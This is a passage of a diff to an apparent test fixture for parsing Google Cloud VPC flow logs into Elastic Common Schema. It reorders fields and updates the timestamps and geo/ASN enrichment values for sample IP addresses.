"{\"insertId\":\"198begsfh44xy0\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":60756},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:43:10.912193869Z", + "end": "2019-06-14T03:43:11.032929292Z", + "id": "198begsfh44xy0", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16809,17 +17663,22 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.14", - "10.87.40.76" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -16836,25 +17695,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 36 + "ms": 82 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392107800Z", - "original": "{\"insertId\":\"198begsfh44xy0\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":60756},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:11.032929292Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:10.912193869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:43:10.912193869Z", - "end": "2019-06-14T03:43:11.032929292Z", - "id": "198begsfh44xy0", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -16863,13 +17707,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65275, @@ -16877,6 +17724,16 @@ "ip": "67.43.156.13", "packets": 710 }, + "event": { + "ingested": "2021-12-14T14:43:27.415263128Z", + "original": "{\"insertId\":\"198begsfh44xxw\",\"jsonPayload\":{\"bytes_sent\":\"67013\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65275},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"82\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.565734921Z", + "end": "2019-06-14T03:49:56.316847800Z", + "id": "198begsfh44xxw", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16888,19 +17745,27 @@ "iana_number": "6", "packets": 710, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.139.99.242", + "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC" + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -16911,38 +17776,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 82 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392111800Z", - "original": "{\"insertId\":\"198begsfh44xxw\",\"jsonPayload\":{\"bytes_sent\":\"67013\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65275},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"82\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.565734921Z", - "end": "2019-06-14T03:49:56.316847800Z", - "id": "198begsfh44xxw", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "Asia", - "country_name": "chn", - "city_name": "Shangqiu", - "region_name": "Henan" + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 4837 + "number": 35908 }, "address": "67.43.156.14", "port": 14236, @@ -16956,6 +17803,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415263696Z", + "original": "{\"insertId\":\"198begsfh44xy5\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":14236,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:09.257387426Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:08.247072525Z", + "end": "2019-06-14T03:40:09.257387426Z", + "id": "198begsfh44xy5", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16967,43 +17824,6 @@ "iana_number": "6", "packets": 1, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:17.291Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "67.43.156.14" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC" - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392116100Z", - "original": "{\"insertId\":\"198begsfh44xy5\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":14236,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:09.257387426Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.247072525Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:08.247072525Z", - "end": "2019-06-14T03:40:09.257387426Z", - "id": "198begsfh44xy5", - "category": "network", - "type": "connection" } }, { @@ -17018,11 +17838,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33542, @@ -17094,7 +17919,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392121100Z", + "ingested": "2021-12-14T14:43:27.415264110Z", "original": "{\"insertId\":\"19im82tfdygznq\",\"jsonPayload\":{\"bytes_sent\":\"64427\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33542},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"351\",\"reporter\":\"DEST\",\"rtt_msec\":\"173\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150870105Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150870105Z", @@ -17116,11 +17941,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -17192,7 +18022,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392125800Z", + "ingested": "2021-12-14T14:43:27.415264505Z", "original": "{\"insertId\":\"19im82tfdygzn6\",\"jsonPayload\":{\"bytes_sent\":\"183366\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33690,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075665334Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075665334Z", @@ -17214,11 +18044,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -17290,7 +18125,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392130200Z", + "ingested": "2021-12-14T14:43:27.415264892Z", "original": "{\"insertId\":\"19im82tfdygznk\",\"jsonPayload\":{\"bytes_sent\":\"185295\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33562,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:49.549471457Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", @@ -17301,43 +18136,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 9200, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 49438, - "bytes": 68961, - "ip": "67.43.156.13", - "packets": 711 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Wx9CFh/CGkJ8gWbPZ6ib0K8z+zk=", - "bytes": 68961, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 711, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -17348,6 +18146,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -17368,15 +18169,52 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392134Z", - "original": "{\"insertId\":\"19im82tfdygznm\",\"jsonPayload\":{\"bytes_sent\":\"68961\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":49438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"711\",\"reporter\":\"DEST\",\"rtt_msec\":\"114\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.398463104Z", + "destination": { + "address": "10.139.99.242", + "port": 9200, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 49438, + "bytes": 68961, + "ip": "67.43.156.13", + "packets": 711 + }, + "event": { + "ingested": "2021-12-14T14:43:27.415265301Z", + "original": "{\"insertId\":\"19im82tfdygznm\",\"jsonPayload\":{\"bytes_sent\":\"68961\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":49438},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"711\",\"reporter\":\"DEST\",\"rtt_msec\":\"114\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.398463104Z", "end": "2019-06-14T03:49:56.220725956Z", "id": "19im82tfdygznm", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Wx9CFh/CGkJ8gWbPZ6ib0K8z+zk=", + "bytes": 68961, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 711, + "direction": "inbound" } }, { @@ -17385,11 +18223,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -17467,7 +18310,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392138Z", + "ingested": "2021-12-14T14:43:27.415265783Z", "original": "{\"insertId\":\"19im82tfdygzob\",\"jsonPayload\":{\"bytes_sent\":\"62072\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33532},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"360\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072372604Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072372604Z", @@ -17489,11 +18332,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -17565,7 +18413,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392142100Z", + "ingested": "2021-12-14T14:43:27.415266234Z", "original": "{\"insertId\":\"19im82tfdygznc\",\"jsonPayload\":{\"bytes_sent\":\"198326\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33590,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.146956782Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.146956782Z", @@ -17581,11 +18429,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -17663,7 +18516,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392145500Z", + "ingested": "2021-12-14T14:43:27.415266650Z", "original": "{\"insertId\":\"19im82tfdygznj\",\"jsonPayload\":{\"bytes_sent\":\"61436\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33550},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", @@ -17679,11 +18532,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -17761,7 +18619,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392149800Z", + "ingested": "2021-12-14T14:43:27.415267085Z", "original": 